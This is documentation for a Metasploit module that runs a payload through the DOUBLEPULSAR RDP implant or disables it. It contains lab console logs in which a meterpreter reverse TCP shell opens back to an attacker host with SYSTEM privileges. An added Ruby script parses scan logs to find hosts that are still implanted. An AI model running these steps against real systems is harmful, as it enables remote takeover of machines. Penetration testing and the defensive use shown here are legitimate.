metasploit-gs/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
2019-11-25 18:12:11 -06:00
## Introduction
This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for RDP.
While this module primarily performs code execution against the implant,
the `Neutralize implant` target allows you to disable the implant.
## Targets
```
Id Name
-- ----
0 Execute payload (x64)
1 Neutralize implant
```
## Options
**DefangedMode**
Set this to `false` to disable defanged mode and enable module
functionality. Set this only if you're SURE you want to proceed.
**ProcessName**
Set this to the userland process you want to inject the payload into.
Defaults to `spoolsv.exe`.
## Usage
Pinging the implant:
```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[+] 192.168.56.115:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
```
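As an added example (not part of the module or its documentation), a small Ruby script that turns the module's console output for a sweep of hosts into per-host findings, so a saved log can be triaged for which hosts still carry an un-neutralized implant. The log lines below are constructed in the shape of the output above; the `.116` and `.117` hosts are hypothetical.

```ruby
# Added example, not Metasploit code: parse msfconsole output from
# rdp_doublepulsar_rce `check` / `run` into structured per-host findings.

# Constructed sample log in the shape the module prints (hosts .116/.117 are made up).
SAMPLE_LOG = <<~LOG
  [*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
  [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
  [+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
  [+] 192.168.56.115:3389 - The target is vulnerable.
  [*] 192.168.56.116:3389 - Sending ping to DOUBLEPULSAR
  [*] 192.168.56.116:3389 - The target is not exploitable.
  [*] 192.168.56.117:3389 - Sending ping to DOUBLEPULSAR
  [!] 192.168.56.117:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
  [+] 192.168.56.117:3389 - Target is Windows Server 6.1.7601 SP1 x64
  [*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
  [+] 192.168.56.115:3389 - Implant neutralization successful
LOG

# "[lvl] host:port - message" as printed by the module's print_* helpers.
LINE_RE = /\A\[(?<lvl>[*+!-])\] (?<host>[\d.]+):(?<port>\d+) - (?<msg>.*)\z/

# Returns { "host:port" => { implant:, os:, neutralized: } } for every host seen.
def parse_findings(log)
  findings = Hash.new { |h, k| h[k] = { implant: false, os: nil, neutralized: false } }
  log.each_line(chomp: true) do |line|
    m = LINE_RE.match(line) or next        # skip handler/session lines without host:port
    f = findings["#{m[:host]}:#{m[:port]}"]
    msg = m[:msg]
    if (os = msg[/\ATarget is (.+)\z/, 1])  # OS string reported after a successful ping
      f[:os] = os
    elsif msg.include?('DOUBLEPULSAR RDP IMPLANT DETECTED')
      f[:implant] = true
    elsif msg.include?('Implant neutralization successful')
      f[:neutralized] = true
    end
  end
  findings
end

# Hosts that answered the ping as implanted and were not neutralized in this log.
def infected_hosts(findings)
  findings.select { |_, f| f[:implant] && !f[:neutralized] }.keys.sort
end

if __FILE__ == $PROGRAM_NAME
  infected_hosts(parse_findings(SAMPLE_LOG)).each { |h| puts "still implanted: #{h}" }
end
```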
Executing a payload:
```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-11-25 18:10:21 -0600
[+] 192.168.56.115:3389 - Payload execution successful
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-S7TDBIENPVM
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```
Neutralizing the implant:
```
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:3389 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
```